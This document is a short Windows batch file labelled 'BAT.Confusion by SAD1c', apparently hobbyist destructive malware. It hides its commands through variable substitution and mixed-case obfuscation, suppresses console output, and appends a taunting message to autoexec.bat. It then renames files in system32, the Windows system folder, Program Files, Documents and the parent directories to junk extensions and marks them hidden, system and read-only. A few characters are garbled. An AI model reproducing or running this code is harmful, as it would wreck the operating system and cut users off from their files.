: BAT.Confusion by SAD1c
@echo off
If C%wIndIr%==C sEt WiNDiR=\wiNNt
SeT #=iF nOt ExIsT %windir%\sYsTeM32\SHutDOwn.exE cTT
sET *=tTrI
Set @=\aUtOeXeC.b
%#%y nUl
A%*%b -R -s %@%aT
eCHo EchO MmMh... sEeMs ThAt "bAt.ConFUSioN" COnfUSed yOuR SyStEm!!! ENjoY!>>%@%AT
a%*%B +r +S %@%At
SEt @=cHdIr
set &=iN (*.*)
seT #=EnAmE
%@%..
fOr %%a %&% a%*%B -r %%a
FoR %%A %&% r%#% %%A *.REd
for %%b %&% A%*%b +r +S +h %%b
%@% %WIndIR%\sySTem32
fOR %%B %&% a%*%b -R %%B
FOr %%c %&% R%#% %%c *.HaStA
FOR %%C %&% A%*%B +R +s +H %%C
%@%..
%@% system
foR %%d %&% a%*%B -r %%d
For %%D %&% r%#% %%D *.lA
FoR %%e %&% A%*%b +r +S +H %%e
%@%..
fOr %%E %&% a%*%B -R %%E
FoR %%f %&% R%#% %%f *.ViCtOrIa
for %%F %&% A%*%b +R +S +h %%F
%@%..
fOR %%g %&% A%*%b -r %%g
FOr %%G %&% r%#% %%G *.SIemPRe
FOR %%h %&% A%*%B +r +s +h %%h
%@% pRoGrA~1
For %%H %&% a%*%B -R %%H
FOR %%i %&% R%#% %%i *.Ch�
foR %%I %&% A%*%B +r +s +H %%I
%@% \dOCuME~1
fOr %%j %&% A%*%B -r %%j
FoR %%J %&% r%#% %%J *.gUEvaRA
SeT #=iF nOt ExIsT %windir%\sYsTeM32\SHutDOwn.exE cTT
for %%k %&% A%*%b +R +S +h %%k
%�%y CoN
clS